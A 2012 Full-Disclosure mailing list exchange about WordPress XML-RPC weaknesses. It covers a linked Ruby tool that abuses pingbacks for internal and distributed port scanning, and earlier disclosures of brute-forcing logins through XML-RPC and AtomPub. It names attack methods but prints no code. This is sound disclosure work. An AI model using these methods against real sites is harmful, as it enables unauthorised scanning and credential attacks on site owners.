Re: Wordpress Pingback Port Scanner

["MustLive" <mustlive () websecurity com ua>]

Hi Chris!

It's good that you've drew attention on possibility of port scanning and 
made nice software for abusing this WP feature.

But I want to remind about another vulnerability in XML-RPC, which I've 
disclosed in 2012. The most important hole in WordPress XML-RPC is Brute 
Force (http://securityvulns.ru/docs27916.html, 
http://lists.grok.org.uk/pipermail/full-disclosure/2012-March/086271.html). 
I've wrote on example of WordPress, but it concerns every web application 
with in XML-RPC support. To BF are vulnerable all versions of WP, but since 
WordPress 2.6 XML-RPC was turned on by default.

And when WordPress developers turned in on in WordPress 3.5 they returned 
the hole back to the masses. Earlier for WP 2.6 - 3.4.2 only those web sites 
were vulnerable, which had turned it on, then since WP 3.5 all web sites 
would be vulnerable again.

The interesting part with Brute Force attacks via XML-RPC and the same with 
Atom Publishing Protocol (to which vulnerable are WP 2.3 - 3.4.2), this hole 
I've also disclosed in 2012 (http://securityvulns.ru/docs27917.html, 
http://lists.grok.org.uk/pipermail/full-disclosure/2012-March/086328.html), 
as I've wrote at my site - it's better reliability then brute forcing via 
login form. Because unlike login form (for which there are plugins to 
protect against BF), no plugins can protect against attacks via XML-RPC and 
AtomPub.

WP developers removed AtomPub from the core (made it as a plugin), so they 
"removed" this BF hole from the core, but at that they enabled BF hole via 
XML-RPC (plus added port scanning functionality). Such wise decision :-).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

From: FireFart_(at)_gmail.com <FireFart_(at)_gmail.com>
Date: 18.12.2012
Subject: Wordpress Pingback Port Scanner

> Hi folks,
> Wordpress 3.5 has it's XML-RPC Interface enabled by default. See here for 
> more information:
> http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api
> /
> http://codex.wordpress.org/Version_3.5#Settings
>
> I read through the article and took a look at the Pinback API since it is 
> public available on many Wordpress installations.
> The cool thing is: you can do a port scan using the Pingback API
> You can even scan the server itself or discover some hosts on the internal 
> Network this server is on.
> So i wrote this little Ruby Script to utilize this "feature":
>
> https://github.com/FireFart/WordpressPingbackPortScanner
>
> You can even use multiple Wordpress XML-RPC Interfaces to scan a single 
> host so this can be some kind of distributed port scanning.
>
> Chris 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/